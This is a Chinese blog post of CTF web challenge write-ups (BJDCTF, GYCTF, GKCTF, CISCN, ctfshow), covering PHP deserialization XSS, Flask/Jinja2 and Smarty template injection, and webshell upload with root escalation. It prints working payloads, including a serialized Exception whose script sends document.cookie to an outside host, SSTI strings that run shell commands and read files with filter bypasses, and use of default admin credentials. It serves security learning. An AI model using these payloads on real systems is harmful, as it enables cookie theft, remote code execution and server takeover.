2021-01-31

最新推荐文章于 2024-06-01 21:43:54 发布
最新推荐文章于 2024-06-01 21:43:54 发布
阅读量482 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missht0/article/details/113487661
版权

[BJDCTF 2nd]xss之光

在这里插入图片描述
扫后台,有.git 泄露
githack下载下来

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

源码只有这三行。
可触发序列化中的魔术方法__toString

__toString的原生类:

  1. ERROR 适用于php7版本
    Error类就是php的一个内置类用于自动自定义一个Error,在php7的环境下可能会造成一个xss漏洞,因为它内置有一个toString的方法。
  2. EXCEPTION 适用于php5、7版本
    这个类利用的方式和原理和Error 类一模一样,但是适用于php5和php7,相对之下更加好用
<?php
$y1ng = new Exception("<script>window.open('url/?'+document.cookie);</script>");
echo urlencode(serialize($y1ng));
?>
//window.open 是 javaScript 打开新窗口的方法

也可以用window.location.href='url'来实现恶意跳转
<?php
$a = new Exception("<script>window.location.href='url'+document.cookie</script>");
echo urlencode(serialize($a));
?>

或者用alert(document.cookie)直接弹出cookie,但此题不行,可能开了httponly(见附录)。
<?php
$y1ng = new Exception("<script>alert(document.cookie)</script>");
echo urlencode(serialize($y1ng));
?>

引自这篇文章

<?php
$y1ng = new Exception("<script>window.open('http://68d1a13c-abde-4bcc-aa80-eb78d3e543cc.node3.buuoj.cn//?'+document.cookie);</script>");
echo urlencode(serialize($y1ng));
?>

?yds_is_so_beautiful=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A110%3A%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2F68d1a13c-abde-4bcc-aa80-eb78d3e543cc.node3.buuoj.cn%2F%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

在这里插入图片描述
我也不知道为啥在这里

在这里插入图片描述

[GYCTF2020]FlaskApp

在这里插入图片描述
官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。
debug模式的情况下可以抛出详细异常信息
base64解密界面随意输入字符串,导致解码报错

在这里插入图片描述
提示存在ssti注入
flask模板注入框架

查看根目录
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}

在这里插入图片描述

读源码
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}

在这里插入图片描述
可以看到过滤了很多关键词

用字符拼接法,

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

在这里插入图片描述

读取文件
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}
这里过滤了flag,用字符串倒序的方法
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}

在这里插入图片描述

[GKCTF2020]老八小超市儿

在这里插入图片描述
进去之后是一个由ShopXO CMS搭建的网站

默认后台地址以及账号密码:/admin.php | admin:shopxo

在这里插入图片描述
进入后台,主题传马
在这里插入图片描述
传到_static_目录下
在这里插入图片描述
这一步一开始我用的是1.7的不行,1.8才可以
在这里插入图片描述
蚁剑连接
在这里插入图片描述
flag里面是假的
在这里插入图片描述
flag.hint,让我们获得root权限
在这里插入图片描述
auto.sh,每60s执行一次这个py程序,名字还是makeflaghint,猜测它有root权限
在这里插入图片描述

在程序中添加两行代码

flag=io.open("/root/flag","r").read()
f.write(str(flag))

然后等60s
在这里插入图片描述

[CISCN2019 华东南赛区]Web11

在这里插入图片描述
看到这个页面就想到抓包xff处注入
在这里插入图片描述
猜测有ssti
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
smarty模板注入

{if phpinfo()}{/if}
{if system('ls')}{/if}
{if readfile('/flag')}{/if}
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if} 

{if system('ls ../../../../..')}{/if}

在这里插入图片描述

{if readfile('/flag')}{/if}

在这里插入图片描述

web254

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            $this->isVip=true;
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = new ctfShowUser();
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

代码审计,首先初始化ctfShowUser类,在第二层if当中首先执行login方法,用于判断我们get传入的参数username和password是否与类中一致,发现用户名和密码都是xxxxxx,因此我们只需要传入username=xxxxxx&password=xxxxxx即可获取flag

切谁怕谁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代码混淆工具 Stunnix-CXX-Obfus 的使用
Andrew Yang's Note
08-13 3728
代码混淆工具 Stunnix-CXX-Obfus 的使用 下载和安装工具 mkdir -p /home/cxx_obfus/ wget http://stunnix.com/pad/trial-nomail/cxxo/Stunnix-CXX-Obfus-4.7-Linux-trial.zip unzip Stunnix-CXX-Obfus-4.7-Linux-trial.zip 经过解压后: /...
Video_2021-01-31_113619.wmv
02-01
Video_2021-01-31_113619.wmv
全国大学生信息安全竞赛初赛writeup
蚁景网安学院
08-24 5180
WEBBabyunserialize扫目录发现了www.zip下载下来发现似曾相识图片之前wmctf2020的webweb出了f3的反序列化题直接用exp打图片System被ban了 ...
使IE8以下的IE浏览器也支持图片的data协议
Less is More
11-06 473
参见[url]http://www.phpied.com/mhtml-when-you-need-data-uris-in-ie7-and-under/[/url] 测试页面:[url]http://phpied.com/files/mhtml/mhtml.html[/url] 原理是使用MHTML(Multipurpose Internet Mail Extensions HyperTe...
2021-01-06
qq_40504996的博客
01-06 831
运行机某个js文件访问不了。做了过滤器,没有被过滤的。其他js文件都可以。就单独一个403。考虑是否是防火墙做了一些敏感词的判断过滤。 将js文件名修改试一下,或者从防火墙那方面做文章 ...
2021-01-18
weixin_54641072的博客
01-18 1737
找程序猿哥哥!!!!编制App或者小程序
2021-01-04
wubaoyu123的博客
01-04 2177
博客园Logo 首页 新闻 博问 专区 闪存 班级 代码改变世界 搜索 注册 登录 返回主页 知了一笑 博客园 首页 新随笔 联系 订阅 管理 数据仓库组件:Hive环境搭建和基础用法 本文源码:GitHub || GitEE 一、Hive基础简介 1、基础描述 Hive是基于Hadoop的一个数据仓库工具,用来进行数据提取、转化、加载,是一个可以对Hadoop中的大规模存储的数据进行查询和分析存储的组件,Hive数据仓库工具能将结构化的数据文件映射为一张数据库表,并提供SQL查询功能,能将SQL语句转变成
CVE-2021-36934提权复现
good good study
01-31 1255
该漏洞由于Windows中多个系统文件的访问控制表(ACL)过于宽松,使得任何标准用户都可以从系统卷影副本中读取包括SAM、SYSETM、SECURITY在内的多个系统文件。得到用户的哈希值后,可以对其进行暴力破解,也可以直接使用本地管理员用户进行哈希传递,从而获取system权限。系统保护在windows系统中默认启动,因此如果已创建还原点,那么标准用户可直接从卷影副本中访问SAM、SYSETM、SECURITY文件。若系统中不曾创建过还原点,那么后面导出哈希时,ntlm哈希为。系统保护开启(默认开启)
2021-02-01 (数组)
qq_51332937的博客
02-01 738
数组 稀疏矩阵 结果:
【CVE-2021-3156】——漏洞复现、原理分析以及漏洞修复
IronmanJay的博客
06-01 1325
2021年01月27日,RedHat官方发布了Sudo缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取Root权限。
2021-01-02
shine_tom的博客
01-02 1186
[root@localhost doc]# man echo [root@localhost doc]# help echo echo: echo [-neE] [arg …] Write arguments to the standard output. Display the ARGs on the standard output followed by a newline. Options: -n do not append a newline -e enable interpretatio
Draft 2021-03-01 10:48:46-数据集
03-04
天池学习赛-测一测你的一见钟情指数 speed_dating_train.csv speed_dating_test.csv
minio-RELEASE.2023-01-31T02-24-19Z版本
02-08
新版本配置 export MINIO_ROOT_USER=admin export MINIO_ROOT_PASSWORD=12345678 原旧版本中的配置是MINIO_ACCESS_KEY和MINIO_SECRET_KEY,请注意别在各博客中直接复制把自己的配置写错了,新下载的minio是用不了旧...
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
12-14
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
gtk3-runtime-3.24.29-2021-04-29-ts-win64.exe
07-10
gtk3-runtime-3.24.29-2021-04-29-ts-win64.exe
C#读取WinCC实时和归档数据
06-21
如何在 C#应用程序中读取 WinCC 变量归档数据,资源来自西门子官网
解放鼠标右键 chrome edge 浏览器 插件
06-21
解放鼠标右键 chrome edge 浏览器 插件 开启开发者模式,拖入扩展管理即可使用
Python实战示例自动办公-20 Python文本数据可视化之“词云”图.zip
06-21
自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图
Pygments-0.11-py2.5.egg
最新发布
06-21
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
改写成开窗函数SELECT date, type, max(score) as max_scoreFROM score_tableWHERE date >= '2021-01-01' AND date <= '2021-01-31'GROUP BY date, typeORDER BY date, type
06-01
WHERE date >= '2021-01-01' AND date <= '2021-01-31' ORDER BY date, type ``` 这个查询语句将返回一个与前面的查询结果相同的结果集,使用了开窗函数max(score) OVER(PARTITION BY date, type)来计算每个日期和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值